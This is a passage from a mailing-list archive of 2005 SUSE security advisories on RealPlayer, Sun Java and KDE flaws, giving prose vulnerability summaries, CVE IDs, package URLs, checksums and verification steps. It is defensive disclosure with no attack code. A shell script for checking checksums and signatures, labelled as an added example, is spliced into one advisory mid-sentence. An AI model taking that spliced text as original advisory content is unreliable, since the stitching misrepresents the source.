   - To fashion a malicious AVI file to cause a buffer overflow to allow
 an attacker to execute arbitrary code on a customer's machine.

   - Using default settings of earlier Internet Explorer browsers,
 a malicious website could cause a local HTML file to be created and
 then trigger an RM file to play which would then reference this local
 HTML file. (Not applicable to Linux.)


   The updated package fixes these problems.

   These are tracked by the Mitre CVE IDs CAN-2005-1766 and CAN-2005-1277.

   This bug affects all SUSE Linux versions that include RealPlayer.

   However, due to the binary only nature of RealPlayer we are only able
   to provide fixed packages for SUSE Linux 9.2, 9.3 and Novell Linux
   Desktop 9.

   For the SUSE Linux versions containing RealPlayer 8 we are no longer
   able to offer security updates (as announced in SUSE-SA:2005:04).

2) Solution or Work-Around

   Please install the upgraded packages.

3) Special Instructions and Notes

   Please restart web browsers which have Real Media content open.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.

   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web.



__

5) Pending Vulnerabilities, Solutions, and Work-Arounds:

   See SUSE Security Summary Report.
__

6) Authenticity Verification and Additional Information

  - Announcement authenticity verification:

SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.

To verify the signature of the announcement, save it as text into a file
and run the command

  gpg --verify file

replacing file with the name of the file where you saved the
announcement. The output for a valid signature looks like:

  gpg: Signature made DATE using RSA key ID 3D25D3D9
  gpg: Good signature from SuSE Security Team [EMAIL PROTECTED]

where DATE is replaced by the date 

[Full-disclosure] SUSE Security Announcement: SUN Java security problems (SUSE-SA:2005:032)

2005-06-22 Thread Marcus Meissner

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

__

SUSE Security Announcement

Package:                java2
Announcement ID:        SUSE-SA:2005:032
Date:                   Wed, 22 Jun 2005 13:00:00 +
Affected Products:      8.2, 9.0, 9.1, 9.2, 9.3
                        SUSE Linux Desktop 1.0
                        SUSE Linux Enterprise Server 9
                        Open Enterprise Server 9
                        Novell Linux Desktop 9
Vulnerability Type:     remote code execution
Severity (1-10):        8
SUSE Default Package:   yes
Cross-References:       CAN-2005-0836
                        CAN-2005-1974


Content of This Advisory:
1) Security Vulnerability Resolved:
 java applet and java webstart security problems
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   Two security bugs in the SUN Java implementation have been fixed.

   Java Web Start can be exploited remotely due to an error in input
   validation of tags in JNLP files, so an attacker can pass arbitrary
   command-line options to the virtual machine to disable the sandbox
   and get access to files.

   This is tracked by the Mitre CVE ID CAN-2005-0836.

   The second bug is the same as the first one but can also be triggered
   by untrusted applets.

   This is tracked by the Mitre CVE ID CAN-2005-1974.

2) Solution or Work-Around

   Install the updated packages.

   A possible workaround is to disable Java Applets in your web browser.

3) Special Instructions and Notes

   None.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the file name of the
   downloaded RPM package.

   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web.



[Full-disclosure] SUSE Security Announcement: RealPlayer buffer overflow in RAM file handling (SUSE-SA:2005:026)

2005-04-20 Thread Marcus Meissner

-----BEGIN PGP SIGNED MESSAGE-----

__

SUSE Security Announcement

Package:                RealPlayer
Announcement-ID:        SUSE-SA:2005:026
Date:                   Wed, 20 Apr 2005 09:00:00 +
Affected products:      9.2, 9.3
                        Novell Linux Desktop 9

Vulnerability Type:     remote code execution
Severity (1-10):        8
SUSE default package:   yes
Cross References:

Content of this advisory:
1) security vulnerability resolved:
 buffer overflow in RAM file handling
   problem description
2) solution/workaround
3) special instructions and notes
4) package location and checksums
5) pending vulnerabilities, solutions, workarounds:
See SUSE Security Summary Report.
6) standard appendix (further information)

__

1) problem description, brief discussion

This update fixes a security issue within the RealPlayer media player.

A remote attacker could craft a special .RAM (Real Audio Media) file
which would cause a buffer overflow when played within RealPlayer.

This is the Real Player Update as referenced on this page:

http://service.real.com/help/faq/security/050419_player/EN/

2) solution/workaround

None, please install the updated packages.

3) special instructions and notes

Restart RealPlayer if running.

4) package location and checksums

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then install the package using the command rpm -Fhv file.rpm to apply
the update.
Our maintenance customers are notified individually. The packages
are offered for installation from the maintenance web.


x86 Platform:

SUSE Linux 9.3:

ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/RealPlayer-10.0.4-1.1.i586.rpm
   b6ca6d5c87690fca385981ccf272ddf1

SUSE Linux 9.2:

ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/RealPlayer-10.0.4-1.1.i586.rpm
   7e87cb712e6f07b9bdefe4f2ea79d6d0


__

5)  Pending vulnerabilities in SUSE Distributions and Workarounds:

See SUSE Security Summary Report.
__

6)  standard appendix: authenticity verification, additional information

  - Package authenticity verification:

SUSE update packages are available on many mirror ftp servers all over
the world. While this service is considered valuable and important
to the free and open source software community, many users wish to be
sure about the origin of the package and its content before installing
it. There are two verification methods that can be used
independently of each other to prove the authenticity of a downloaded
file or rpm package:
1) md5sums as provided in the (cryptographically signed) announcement.
2) using the internal gpg signatures of the rpm package.

1) execute the command
md5sum name-of-the-file.rpm
   after you have downloaded the file from a SUSE ftp server or one of
   its mirrors. Then compare the resulting md5sum with the one listed
   in the announcement. Since the announcement containing the checksums
   is cryptographically signed (usually using the key [EMAIL PROTECTED]),
   the checksums prove the authenticity of the package.
   We advise against subscribing through security lists whose mailing
   list software modifies the email message containing the announcement,
   because the signature will then no longer match after transport.
   Downsides: You must be able to verify the authenticity of the
   announcement in the first place. If RPM packages are rebuilt
   and a new version of a package is published on the ftp server, all
   md5 sums for the files become useless.

2) rpm package signatures provide an easy way to verify the authenticity
   of an rpm package. Use the command
rpm -v --checksig file.rpm
   to verify the signature of the package, where file.rpm is the
   filename of the rpm package that you have downloaded. Of course,
   package authenticity verification can only target an un-installed rpm
   package file.
   Prerequisites:
a) gpg is installed
b) The package is signed using a certain key. The public part of this
   key must be installed by the gpg program in the directory
   ~/.gnupg/ under the home directory of the user who performs the
   signature verification (usually root). You can import 
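An added example, not from the SUSE advisory or its tooling, that automates the two checks this appendix describes: it parses the URL/md5 list layout used in section 4), compares each downloaded package's md5sum against it, and runs rpm -v --checksig where rpm is installed. The list file, the directory of downloads, the helper names and the use of md5sum, sed and cut are assumptions.

```shell
#!/bin/sh
# Added example, not part of the SUSE advisory or its tools: check downloaded
# RPMs against the URL/md5 pairs printed in section 4) of a SUSE Security
# Announcement, then verify the package's own GPG signature when rpm exists.
# Assumed list layout (as in the advisory): an ftp:// URL line followed by a
# line holding only the 32-hex-digit md5sum. Needs md5sum, sed and cut.

# verify_md5 FILE EXPECTED -> 0 if the file's md5sum equals EXPECTED, else 1
verify_md5() {
    actual=$(md5sum "$1" | cut -d' ' -f1)
    [ "$actual" = "$2" ]
}

# verify_rpm_sig FILE -> rpm's verdict on the embedded signature (method 2);
# returns 2 when rpm is not installed so "not checked" differs from "failed"
verify_rpm_sig() {
    command -v rpm >/dev/null 2>&1 || return 2
    rpm -v --checksig "$1" >/dev/null 2>&1
}

# check_advisory_list LISTFILE DIR -> for every URL/md5 pair in LISTFILE, look
# for the package basename in DIR and compare checksums. Prints one line
# "OK|BAD|MISSING <name>" per entry; returns 1 if any entry was BAD.
check_advisory_list() {
    status=0
    url=""
    while IFS= read -r line; do
        line=$(printf '%s' "$line" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')
        case "$line" in
            ftp://*|http://*|https://*) url=$line ;;   # remember the package URL
            ""|*[!0-9a-f]*) ;;                         # headings etc.: ignore
            *)  # a bare hex string: treat it as the md5 of the preceding URL
                if [ -n "$url" ] && [ ${#line} -eq 32 ]; then
                    name=${url##*/}
                    if [ ! -f "$2/$name" ]; then
                        echo "MISSING $name"
                    elif verify_md5 "$2/$name" "$line"; then
                        echo "OK $name"
                    else
                        echo "BAD $name"; status=1
                    fi
                    url=""
                fi ;;
        esac
    done < "$1"
    return $status
}

# usage: sh check_advisory.sh advisory.txt ./downloads
if [ $# -eq 2 ]; then check_advisory_list "$1" "$2"; fi
```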

[Full-disclosure] SUSE Security Announcement: various KDE security problems (SUSE-SA:2005:022)

2005-04-11 Thread Marcus Meissner

-----BEGIN PGP SIGNED MESSAGE-----

__

SUSE Security Announcement

Package:                kdelibs3
Announcement-ID:        SUSE-SA:2005:022
Date:                   Mon, 11 Apr 2005 15:00:00 +
Affected products:      9.1, 9.2, 9.3
                        SUSE Linux Enterprise Server 9
                        Novell Linux Desktop 9
Vulnerability Type:     remote code execution
                        local denial of service
Severity (1-10):        8
SUSE default package:   yes
Cross References:       CAN-2005-0237
                        CAN-2005-0396

Content of this advisory:
1) security vulnerability resolved:
 several security problems in KDE
   problem description
2) solution/workaround
3) special instructions and notes
4) package location and checksums
5) pending vulnerabilities, solutions, workarounds:
See SUSE Security Summary Report.

6) standard appendix (further information)

__

1) problem description, brief discussion

Several vulnerabilities have been identified and fixed in the KDE
desktop environment.

- A buffer overflow via specially crafted PCX pictures was fixed.

  This could lead to a remote attacker being able to execute code
  as the user opening or viewing a PCX image. This PCX image could
  have been embedded within a web page or email.

  This affects SUSE Linux 9.1 up to 9.3, SUSE Linux Enterprise Server
  9 and Novell Linux Desktop 9.


- The IDN domain name cloaking problem was fixed.

  A remote website could disguise its name as another, potentially
  trusted site by abusing an extension originally meant for non-ASCII
  domain names (IDN) with homographs, characters that look exactly
  like other letters.

  The fix used by KDE is to only allow homographs for trusted domains.
  It is disabled by default for the .net, .com and .org domains.

  This issue exists in SUSE Linux 9.1 and 9.2, SUSE Linux Enterprise
  Server 9 and Novell Linux Desktop 9.  It has been assigned the
  Mitre CVE ID  CAN-2005-0233.


- A denial of service attack against the DCOP service was fixed.

  A local user could cause another user's KDE session to visibly hang
  by writing bad data to the world-writable DCOP socket. The socket
  has been made writable only by its owning user.

  This was found by Sebastian Krahmer of SUSE Security.

  This affects all SUSE Linux versions, except SUSE Linux 9.3.
  Updates for SUSE Linux up to 9.0 and SUSE Linux Enterprise Server
  8 are not included for this minor issue. They will be included
  should a later security update for different issues be necessary.

  This is tracked by the Mitre CVE ID CAN-2005-0396.

Additionally, the following bug was fixed:

- A possible race in the DNS resolver causing unresolved hosts in rare
  cases was fixed.  This only affected SUSE Linux 9.3.

2) solution/workaround

Please install the updated packages.

3) special instructions and notes

Make sure you restart your KDE session after this update.

4) package location and checksums

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then install the package using the command rpm -Fhv file.rpm to apply
the update.
Our maintenance customers are notified individually. The packages
are offered for installation from the maintenance web.


x86 Platform:

SUSE Linux 9.3:

ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kdelibs3-3.4.0-20.3.i586.rpm
   6b63160218d7e9023418980186942ab3

ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/kdelibs3-32bit-9.3-7.1.x86_64.rpm
   7de0dcf016ad28f3f95c9110a376dc7b

SUSE Linux 9.2:

ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/kdelibs3-3.3.0-34.5.i586.rpm
   47c8c9ccb24b30261de0910ff5bfa19e

ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/kdelibs3-32bit-9.2-200504081300.x86_64.rpm
   7da9ca5c0cefb043ea170c59beaa588a

SUSE Linux 9.1:

ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kdelibs3-3.2.1-44.46.i586.rpm
   6dd4f0b38a750f256f6639decda2a968

ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/i586/kdelibs3-32bit-9.1-200504071814.i586.rpm
   955791a7b3973698f2c9ea8b0cd09716
source rpm(s):

ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kdelibs3-3.2.1-44.46.src.rpm
   3f5585b97d663b7d6d9bcac0f8c0b7a0

x86-64 Platform:

SUSE Linux 9.3:

ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/kdelibs3-3.4.0-20.3.x86_64.rpm